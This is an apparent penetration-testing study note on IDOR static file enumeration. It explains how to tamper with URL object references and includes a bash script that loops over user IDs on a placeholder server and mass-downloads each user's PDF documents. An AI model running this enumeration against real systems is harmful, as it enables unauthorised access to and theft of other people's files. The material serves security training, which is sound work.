static file enumeration is a technique used to identify IDORs where the files have a predictable naming pattern such as /documents/report_2_10_2022.pdf and /document/class_1_09_2022.pdf
#IDOR identification & testing: Plaint-Text URL Parameter value
root@oco:~$ BROWSER > {targetSite:port}
URL parameter: ?uid=1 or ?filename=file_1.pdf
* study the HTTP requests to look for URL parameters or APIs with an object reference
- this may also be found in other HTTP headers, like cookies.
root@oco:~$ BROWSER > {targetSite:port}
URL parameter: ?uid={arbitraryValue} or ?filename=file_{arbitraryValue}.pdf
* try incrementing the values of the object references to retrieve other data
#download all documents from all employees with uids between 1-10
root@oco:~$ nano idorStaticFileEnumeration.sh
#!/bin/bash
url="http://SERVER_IP:PORT"
for i in {1..10}; do
for link in $(curl -s "$url/documents.php?uid=$i" | grep -oP "\/documents.*?.pdf"); do
wget -q $url/$link
done
done
* -o (only matching): Displays only the matching parts of a line instead of the entire line.
* -P (Perl-compatible regular expressions): Enables the use of Perl-compatible regular expressions, which are more expressive and flexible than the standard POSIX regex.
root@oco:~$ chmod 777 idorStaticFileEnumeration.sh
root@oco:~$ ./idorStaticFileEnumeration.sh
